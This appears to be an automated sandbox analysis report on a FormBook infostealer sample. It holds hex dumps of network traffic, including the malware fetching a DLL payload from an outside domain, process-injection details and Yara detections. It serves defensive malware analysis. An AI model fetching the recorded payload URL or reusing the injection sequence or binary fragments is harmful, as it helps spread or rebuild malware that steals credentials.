                                                    Data Ascii: 0d5+_7uHG''r6n+JeQz'S5#eq{iCuwD;Pofy?*uq6Endx+'GAD$VB P@/ y{1?f38dh4T/S#G17D,\`\>PW<(%kzfh<_arj0KbQCz r
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 76 f4 64 d4 e2 26 93 2d 65 92 e6 65 25 32 84 c8 7c ad 89 81 16 f5 43 9f 9c 99 7e 10 b1 29 7f 61 9a 7f 9f 5d 68 99 47 62 83 1b 0e e3 40 29 69 ff 65 76 0a 8c 93 91 0b 87 df c3 a4 a6 7b c8 c2 1a 4f 2a 38 62 32 1a 90 4a 16 ba 7e cf 0a 6e 55 0a 12 6f c4 8f 9d 3c 46 db 2a 34 7f 3b 7d 36 09 cf 27 93 37 b6 51 79 48 4e 70 1d e7 8f 2e f8 a8 60 a2 13 4a 1f 60 a0 aa 33 48 f1 98 7f f7 3e fb ce 3c 95 ba a1 4f ab ae 0c 85 49 05 46 80 cf 8e 90 35 3a 6a c6 d3 84 45 40 2b ef e1 4d b6 05 c8 8e 73 1a 98 71 1c 09 1d f5 27 fd 51 ad f7 e3 c5 8d 4b e1 92 16 85 75 99 f3 cd 35 2b ce 0a 5b a7 d7 04 bd f3 a6 a6 30 a8 09 17 e0 95 18 e2 7c b3 1d 67 1b 7d ba 2d 15 3a 3e 3c fe aa 61 5d d7 a0 23 57 48 c9 be 01 58 5b 4e 8f fd 15 f7 8a e5 c6 85 c5 68 18 15 ac 0b 6f 51 73 11 8b 1b 42 b0 5e
                                                    Data Ascii: vd&-ee%2|C~)a]hGb@)iev{O*8b2J~nUo<F*4;}6'7QyHNp.`J`3H><OIF5:jE@+Msq'QKu5+[0|g}-:><a]#WHX[NhoQsB^
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 44 c0 e2 21 5f f9 a0 55 e2 e5 42 18 bf ec d2 c8 11 59 cc a7 d1 d0 86 77 57 89 75 84 c1 d6 92 af 84 9a 13 c0 13 5d b2 a3 71 44 ce 88 04 06 4e f5 87 9e 85 30 be 88 a4 af 14 82 1d 5f b7 83 0e 30 c5 36 06 44 a7 6d 2b 16 78 08 39 1e 6c d5 04 20 79 f6 a9 c5 64 1e 38 3f e5 f2 96 71 17 a5 c9 8c 19 63 b5 1c 21 a7 cc 2c 9f b3 7f ad 64 a2 82 ad eb 39 8a 47 4c 23 7e 16 a9 a7 54 85 28 82 a8 a3 65 00 a2 f8 23 93 16 29 6b 45 f1 f6 37 49 b8 e5 43 9b f3 0f 2f c2 63 dd af 34 12 d1 5a 41 a6 e4 7a 5e 6f 77 bd 95 4e bb f0 44 41 53 8e 03 a1 a7 bc c1 13 72 a6 50 d9 03 a5 2d 54 5c de 59 af 21 11 59 9c f0 b4 8a 97 91 31 15 49 b8 b6 9b 27 7d b1 64 95 7d da e5 bc 0d b4 b6 14 c7 ac d6 2d 6e dc ff 47 6d b6 30 ce c2 c4 35 a3 cd 0a 13 8a 63 ea 89 09 6f 1b 6a 6d 15 ad 9b c7 d4 1c d3 06
                                                    Data Ascii: D!_UBYwWu]qDN0_06Dm+x9l yd8?qc!,d9GL#~T(e#)kE7IC/c4ZAz^owNDASrP-T\Y!Y1I'}d}-nGm05cojm
                                                    2024-09-11 13:43:06 UTC16384INData Raw: 9e 99 9c 9f 06 80 74 95 0f 61 fe 65 64 6a 67 6f 19 60 26 62 53 24 bf 6c c0 46 10 ac cd 95 2d 89 5e 1f 7f 57 8d 31 bc 6c f9 4a 7a ef ca b7 92 10 ab c2 3b 56 94 40 e8 8b 7f 96 07 35 28 93 74 c3 b3 62 d2 6a 98 75 30 15 83 7d 4d 4f c5 dc 54 91 55 ee fd d4 13 f7 49 ab 6e 2b 9d 20 07 c0 60 48 40 4c dd 93 61 f0 72 d3 e3 41 21 a3 c5 e2 4a 9e 2d 66 7e 85 f9 3f ad 5a 11 b0 b7 d7 c8 39 5d 9c 3e 2c 4e 24 c9 72 27 31 26 66 68 05 b9 9b 1a 55 15 f1 3e 22 57 0b 99 03 25 03 c8 d7 d5 21 a7 d9 c2 4e e8 6f bb f4 d1 99 13 1c 1d 8d 08 e8 22 d2 3c 23 ca a8 41 31 72 44 5c 26 0c 6c a6 fd 4d 0a 35 09 5c 05 6a a9 ad 2c ee 69 17 88 f8 e7 b3 b8 72 8f 3f b1 ad 4a 9e 6f ee 0e e0 48 11 5d ab 42 66 7b 45 5a 2e 8a 38 6d 5c 13 fa c9 64 f5 5d 16 10 7a c0 22 d4 8c 72 2a a6 48 ab 3a cf 5d 87
                                                    Data Ascii: taedjgo`&bS$lF-^W1lJz;V@5(tbju0}MOTUIn+ `H@LarA!J-f~?Z9]>,N$r'1&fhU>"W%!No"<#A1rD\&lM5\j,ir?JoH]Bf{EZ.8m\d]z"r*H:]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.84970789.42.218.724436364C:\Users\user\Desktop\x.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-09-11 13:43:07 UTC51OUTGET /we/DEMONCODER.dll HTTP/1.1
                                                    Host: epsys.ro
                                                    2024-09-11 13:43:07 UTC291INHTTP/1.1 200 OK
                                                    Connection: close
                                                    content-type: application/x-msdownload
                                                    last-modified: Fri, 06 Sep 2024 12:46:32 GMT
                                                    accept-ranges: bytes
                                                    content-length: 15360
                                                    date: Wed, 11 Sep 2024 13:43:06 GMT
                                                    server: LiteSpeed
                                                    x-xss-protection: 1; mode=block
                                                    x-content-type-options: nosniff
                                                    2024-09-11 13:43:07 UTC1077INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 78 f9 da 66 00 00 00 00 00 00 00 00 e0 00 2e 20 0b 01 30 00 00 34 00 00 00 38 00 00 00 00 00 00 2e 53 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxf. 048.S `@ `
                                                    2024-09-11 13:43:07 UTC14283INData Raw: 00 04 11 06 28 03 00 00 06 25 26 1f 4c 28 10 00 00 06 fe 01 13 15 11 15 2c 10 1d 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 11 06 1f 50 28 10 00 00 06 94 13 07 1f 54 28 10 00 00 06 13 08 09 7b 01 00 00 04 11 07 1f 58 28 10 00 00 06 58 12 08 1f 5c 28 10 00 00 06 12 00 28 06 00 00 06 25 26 1f 60 28 10 00 00 06 fe 01 13 16 11 16 2c 10 1a 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 11 05 11 08 fe 01 13 17 11 17 2c 30 00 09 7b 01 00 00 04 11 08 28 08 00 00 06 25 26 1f 64 28 10 00 00 06 fe 03 13 18 11 18 2c 10 1d 45 01 00 00 00 f6 ff ff ff 73 17 00 00 0a 7a 00 04 11 04 1f 68 28 10 00 00 06 58 28 18 00 00 0a 25 26 13 09 04 11 04 1f 6c 28 10 00 00 06 58 28 18 00 00 0a 13 0a 1f 70 28 10 00 00 06 13 0b 09 7b 01 00 00 04 11 05 11 09 1f 74 28 10 00 00 06 1f 78 28
                                                    Data Ascii: (%&L(,EszP(T({X(X\((%&`(,Esz,0{(%&d(,Eszh(X(%&l(X(p({t(x(


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:43:03
                                                    Start date:11/09/2024
                                                    Path:C:\Users\user\Desktop\x.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\x.exe"
                                                    Imagebase:0xe00000
                                                    File size:24'576 bytes
                                                    MD5 hash:BA5EE405D2CC8EF536634C4E8E4BF0CB
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    General

                                                    Target ID:2
                                                    Start time:09:43:06
                                                    Start date:11/09/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                    Imagebase:0x2d0000
                                                    File size:56'368 bytes
                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:09:43:06
                                                    Start date:11/09/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                    Imagebase:0xf30000
                                                    File size:56'368 bytes
                                                    MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1889226156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1889593144.0000000001920000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1890039975.00000000045D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:09:43:38
                                                    Start date:11/09/2024
                                                    Path:C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe"
                                                    Imagebase:0x540000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3318242256.0000000005670000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:6
                                                    Start time:09:43:41
                                                    Start date:11/09/2024
                                                    Path:C:\Windows\SysWOW64\rasdial.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                    Imagebase:0x980000
                                                    File size:19'456 bytes
                                                    MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3318244175.0000000004890000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3318289936.00000000048E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3316284006.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    General

                                                    Target ID:9
                                                    Start time:09:43:53
                                                    Start date:11/09/2024
                                                    Path:C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe"
                                                    Imagebase:0x540000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3320183434.00000000053F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:10
                                                    Start time:09:44:04
                                                    Start date:11/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6d20e0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:31.1%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:31
                                                      Total number of Limit Nodes:1
                                                      execution_graph 2958 17e578c 2959 17e5790 CreateProcessW 2958->2959 2961 17e598c 2959->2961 2961->2961 2930 17e5b18 2931 17e5b8b Wow64SetThreadContext 2930->2931 2932 17e5b76 2930->2932 2933 17e5bd4 2931->2933 2932->2931 2934 17e5798 2935 17e5825 CreateProcessW 2934->2935 2937 17e598c 2935->2937 2937->2937 2938 17e5c28 2939 17e5c29 ReadProcessMemory 2938->2939 2940 17e5ce7 2939->2940 2941 17e5e48 2942 17e5e49 WriteProcessMemory 2941->2942 2944 17e5f28 2942->2944 2947 17e5d38 2948 17e5d40 VirtualAllocEx 2947->2948 2949 17e5df7 2948->2949 2945 17e5d40 VirtualAllocEx 2946 17e5df7 2945->2946 2950 17e5c20 2951 17e5c29 ReadProcessMemory 2950->2951 2952 17e5c24 2950->2952 2953 17e5ce7 2951->2953 2952->2951 2954 17e5b10 2955 17e5b18 Wow64SetThreadContext 2954->2955 2957 17e5bd4 2955->2957 2962 17e5e40 2963 17e5e44 WriteProcessMemory 2962->2963 2965 17e5f28 2963->2965

                                                      Executed Functions

                                                      Function 017E4290 Relevance: 1.0, Instructions: 950COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 112 17e4290-17e4292 113 17e4299-17e429a 112->113 114 17e4294-17e4298 112->114 115 17e429b-17e429d 113->115 116 17e42a1-17e42b0 113->116 114->113 119 17e430e-17e4311 115->119 120 17e429f 115->120 117 17e42b7-17e42cf 116->117 118 17e42b2 116->118 118->117 121 17e4318-17e4486 call 17e42a0 * 3 119->121 122 17e4313 119->122 120->116 138 17e4488-17e448f 121->138 139 17e44f0-17e45a2 call 17e42a0 * 2 call 17e2c2c call 17e42a0 121->139 122->121 138->138 141 17e4491-17e4496 138->141 154 17e45a4-17e45ab 139->154 155 17e45d3-17e46bd call 17e42a0 * 5 139->155 143 17e44a8-17e44ea 141->143 144 17e4498-17e44a2 141->144 143->139 144->143 154->154 157 17e45ad-17e45c8 154->157 172 17e46bf 155->172 173 17e46c4-17e4709 call 17e42a0 155->173 157->155 172->173 177 17e470f-17e4716 173->177 178 17e478c-17e47d3 call 17e2c44 call 17e42a0 173->178 177->177 180 17e4718-17e4725 call 17e2c38 177->180 188 17e4804-17e482f call 17e42a0 178->188 189 17e47d5-17e47dc 178->189 184 17e472a-17e4760 call 17e42a0 180->184 190 17e4788-17e478a 184->190 191 17e4762-17e477d 184->191 196 17e4836-17e4900 call 17e42a0 * 3 call 17e2c50 call 17e42a0 188->196 197 17e4831 188->197 189->189 193 17e47de-17e47f9 189->193 190->188 191->190 193->188 211 17e4902-17e4909 196->211 212 17e4931-17e494d 196->212 197->196 211->211 215 17e490b-17e4926 211->215 213 17e494f-17e4994 call 17e2c5c call 17e42a0 212->213 214 17e49c6-17e4af3 call 17e42a0 * 5 call 17e2c68 212->214 226 17e4996-17e499d 213->226 227 17e49c5 213->227 241 17e4b2c-17e4b36 call 17e42a0 214->241 242 17e4af5-17e4b2a call 17e42a0 214->242 215->212 226->226 229 17e499f-17e49ba 226->229 227->214 229->227 247 17e4b3c-17e4b50 241->247 242->247 248 17e4bf9-17e4c34 call 17e42a0 247->248 249 17e4b56-17e4b5d 247->249 254 17e4c36-17e4c3d 248->254 255 17e4c65-17e4cb6 call 17e2c74 call 17e42a0 248->255 249->249 250 17e4b5f-17e4bf8 call 17e42a0 * 4 call 17e2c68 249->250 250->248 254->254 257 17e4c3f-17e4c5a 254->257 269 17e4cb8-17e4cbf 255->269 270 17e4ce7-17e4d7c call 17e42a0 * 3 255->270 257->255 269->269 273 17e4cc1-17e4cdc 269->273 284 17e5056-17e50cb call 17e42a0 * 2 270->284 273->270 289 17e4d81-17e4ea9 call 17e42a0 * 4 284->289 290 17e50d1-17e50d8 284->290 318 17e4eaf-17e4f8c call 17e42a0 * 2 call 17e4258 call 17e42a0 call 17e2c74 289->318 319 17e4ff9-17e5050 call 17e42a0 * 2 289->319 290->290 291 17e50da-17e519f call 17e42a0 * 2 call 17e2c74 call 17e42a0 290->291 310 17e51d0-17e522f call 17e42a0 291->310 311 17e51a1-17e51a8 291->311 325 17e5243-17e527a call 17e42a0 310->325 326 17e5231-17e5238 310->326 311->311 314 17e51aa-17e51c5 311->314 314->310 350 17e4f91-17e4fc7 call 17e42a0 318->350 319->284 336 17e527c 325->336 337 17e5281-17e52bf call 17e42a0 325->337 326->326 330 17e523a-17e523d 326->330 330->325 336->337 345 17e5335-17e537c call 17e2c8c call 17e42a0 337->345 346 17e52c1-17e52ce call 17e2c80 337->346 361 17e537e-17e5385 345->361 362 17e53ad-17e53b3 call 17e2c98 345->362 352 17e52d3-17e5309 call 17e42a0 346->352 359 17e4ff8 350->359 360 17e4fc9-17e4fd0 350->360 363 17e530b-17e5326 352->363 364 17e5331-17e5333 352->364 359->319 360->360 366 17e4fd2-17e4fed 360->366 361->361 367 17e5387-17e53a2 361->367 368 17e53b8-17e53ee call 17e42a0 362->368 363->364 364->362 366->359 367->362 375 17e541f-17e54dd call 17e42a0 368->375 376 17e53f0-17e53f7 368->376 376->376 379 17e53f9-17e5414 376->379 379->375
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2074460590b59bbfee6c03c74c363854f818476e55aca32f5d75aea6aa544d4
                                                      • Instruction ID: be4f00e73c7571e3b279f4cca88b3f21f148daf4827a471a9364afe79682800b
                                                      • Opcode Fuzzy Hash: f2074460590b59bbfee6c03c74c363854f818476e55aca32f5d75aea6aa544d4
                                                      • Instruction Fuzzy Hash: F6A2AF74E0522A8FDBA5DF68C988BDDBBF5AB49300F5081EAD50DA7251DB349E80CF50
                                                      Function 017E42D0 Relevance: .8, Instructions: 753COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 386 17e42d0-17e42d2 387 17e42d9-17e42da 386->387 388 17e42d4-17e42d6 386->388 391 17e42db-17e42dc 387->391 392 17e42e1-17e4311 387->392 389 17e42dd 388->389 390 17e42d8 388->390 395 17e434e-17e4486 call 17e42a0 * 3 389->395 396 17e42de-17e42e0 389->396 390->387 391->389 393 17e4318-17e434c 392->393 394 17e4313 392->394 393->395 394->393 410 17e4488-17e448f 395->410 411 17e44f0-17e45a2 call 17e42a0 * 2 call 17e2c2c call 17e42a0 395->411 396->392 410->410 413 17e4491-17e4496 410->413 426 17e45a4-17e45ab 411->426 427 17e45d3-17e46bd call 17e42a0 * 5 411->427 415 17e44a8-17e44ea 413->415 416 17e4498-17e44a2 413->416 415->411 416->415 426->426 429 17e45ad-17e45c8 426->429 444 17e46bf 427->444 445 17e46c4-17e4709 call 17e42a0 427->445 429->427 444->445 449 17e470f-17e4716 445->449 450 17e478c-17e47d3 call 17e2c44 call 17e42a0 445->450 449->449 452 17e4718-17e4725 call 17e2c38 449->452 460 17e4804-17e482f call 17e42a0 450->460 461 17e47d5-17e47dc 450->461 456 17e472a-17e4760 call 17e42a0 452->456 462 17e4788-17e478a 456->462 463 17e4762-17e477d 456->463 468 17e4836-17e4900 call 17e42a0 * 3 call 17e2c50 call 17e42a0 460->468 469 17e4831 460->469 461->461 465 17e47de-17e47f9 461->465 462->460 463->462 465->460 483 17e4902-17e4909 468->483 484 17e4931-17e494d 468->484 469->468 483->483 487 17e490b-17e4926 483->487 485 17e494f-17e4994 call 17e2c5c call 17e42a0 484->485 486 17e49c6-17e4af3 call 17e42a0 * 5 call 17e2c68 484->486 498 17e4996-17e499d 485->498 499 17e49c5 485->499 513 17e4b2c-17e4b36 call 17e42a0 486->513 514 17e4af5-17e4b2a call 17e42a0 486->514 487->484 498->498 501 17e499f-17e49ba 498->501 499->486 501->499 519 17e4b3c-17e4b50 513->519 514->519 520 17e4bf9-17e4c34 call 17e42a0 519->520 521 17e4b56-17e4b5d 519->521 526 17e4c36-17e4c3d 520->526 527 17e4c65-17e4cb6 call 17e2c74 call 17e42a0 520->527 521->521 522 17e4b5f-17e4bf8 call 17e42a0 * 4 call 17e2c68 521->522 522->520 526->526 529 17e4c3f-17e4c5a 526->529 541 17e4cb8-17e4cbf 527->541 542 17e4ce7-17e4d7c call 17e42a0 * 3 527->542 529->527 541->541 545 17e4cc1-17e4cdc 541->545 556 17e5056-17e50cb call 17e42a0 * 2 542->556 545->542 561 17e4d81-17e4ea9 call 17e42a0 * 4 556->561 562 17e50d1-17e50d8 556->562 590 17e4eaf-17e4f8c call 17e42a0 * 2 call 17e4258 call 17e42a0 call 17e2c74 561->590 591 17e4ff9-17e5050 call 17e42a0 * 2 561->591 562->562 563 17e50da-17e519f call 17e42a0 * 2 call 17e2c74 call 17e42a0 562->563 582 17e51d0-17e522f call 17e42a0 563->582 583 17e51a1-17e51a8 563->583 597 17e5243-17e527a call 17e42a0 582->597 598 17e5231-17e5238 582->598 583->583 586 17e51aa-17e51c5 583->586 586->582 622 17e4f91-17e4fc7 call 17e42a0 590->622 591->556 608 17e527c 597->608 609 17e5281-17e52bf call 17e42a0 597->609 598->598 602 17e523a-17e523d 598->602 602->597 608->609 617 17e5335-17e537c call 17e2c8c call 17e42a0 609->617 618 17e52c1-17e52ce call 17e2c80 609->618 633 17e537e-17e5385 617->633 634 17e53ad-17e53b3 call 17e2c98 617->634 624 17e52d3-17e5309 call 17e42a0 618->624 631 17e4ff8 622->631 632 17e4fc9-17e4fd0 622->632 635 17e530b-17e5326 624->635 636 17e5331-17e5333 624->636 631->591 632->632 638 17e4fd2-17e4fed 632->638 633->633 639 17e5387-17e53a2 633->639 640 17e53b8-17e53ee call 17e42a0 634->640 635->636 636->634 638->631 639->634 647 17e541f-17e54dd call 17e42a0 640->647 648 17e53f0-17e53f7 640->648 648->648 651 17e53f9-17e5414 648->651 651->647
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0198a72a17ca082b8e0cbc2a742a3b71f76d78ff802f195addd7170b1cdef7f
                                                      • Instruction ID: 275bebae43c7e114730ea380660f93f628ccbb31748ea68259d906a8df163a68
                                                      • Opcode Fuzzy Hash: e0198a72a17ca082b8e0cbc2a742a3b71f76d78ff802f195addd7170b1cdef7f
                                                      • Instruction Fuzzy Hash: A982AF74E0522A8FDB65DF68C998BEDBBF5AB89300F5081EAD50DA7251DB305E80CF50
                                                      Function 017E0D61 Relevance: .6, Instructions: 577COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 658 17e0d61-17e0da4 659 17e0dab-17e0e88 658->659 660 17e0da6 658->660 662 17e0e9f-17e0ea3 659->662 660->659 663 17e0e8a-17e0e9c 662->663 664 17e0ea5-17e0eac 662->664 663->662 664->664 665 17e0eae-17e0eb3 664->665 667 17e0ec5-17e0ef2 665->667 668 17e0eb5-17e0ebf 665->668 671 17e0ef8-17e0eff 667->671 672 17e13a4-17e13ab 667->672 668->667 671->671 673 17e0f01-17e0fce 671->673 674 17e14ed-17e14f4 672->674 675 17e13b1-17e13b8 672->675 715 17e1005-17e1011 673->715 676 17e14f6-17e14fd 674->676 677 17e1523-17e155a 674->677 675->675 678 17e13ba-17e13c1 675->678 676->676 680 17e14ff-17e1520 676->680 692 17e155c-17e155e 677->692 693 17e1567-17e156a 677->693 681 17e142a-17e1489 call 17e04dc 678->681 682 17e13c3-17e13ca 678->682 708 17e148f-17e14b6 681->708 682->682 683 17e13cc-17e13d6 682->683 685 17e13d8-17e13df 683->685 686 17e1417-17e1424 683->686 685->685 690 17e13e1-17e1415 685->690 686->681 690->681 697 17e1565 692->697 698 17e1560 692->698 699 17e156c 693->699 700 17e1571-17e15bc 693->700 697->700 698->697 699->700 713 17e14b8-17e14cb 708->713 714 17e14d1-17e14d7 708->714 713->714 714->708 716 17e14d9-17e14e0 714->716 718 17e1013-17e101a 715->718 719 17e0fd0-17e0fdc 715->719 716->716 717 17e14e2-17e14e7 716->717 717->674 718->718 722 17e101c-17e1020 718->722 720 17e0fde 719->720 721 17e0fe3-17e0fef 719->721 720->721 723 17e1002 721->723 724 17e0ff1-17e0ff8 721->724 725 17e1056-17e1071 722->725 726 17e1022-17e1029 722->726 723->715 724->724 727 17e0ffa-17e1000 724->727 731 17e10d8-17e110b 725->731 732 17e1073-17e107d 725->732 726->726 728 17e102b-17e1050 726->728 727->722 728->725 740 17e1117-17e11a3 731->740 733 17e107f-17e1086 732->733 734 17e10c5-17e10d2 732->734 733->733 737 17e1088-17e10c3 733->737 734->731 737->731 748 17e1213-17e124d 740->748 750 17e124f 748->750 751 17e1261-17e1268 748->751 752 17e11a5-17e1210 750->752 753 17e1255-17e125b 750->753 751->751 754 17e126a-17e139e 751->754 752->748 753->751 753->752 754->672
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3320312020.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_17e0000_x.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d5f9424131a99713b5fa70e5ef768004c1b92a89ec2f21b036a64752e0758f2
                                                      • Instruction ID: 794d5f9168971d2df10484966cb3d36c0e18eb2462d688f73e483be3000d0842
                                                      • Opcode Fuzzy Hash: 0d5f9424131a99713b5fa70e5ef768004c1b92a89ec2f21b036a64752e0758f2
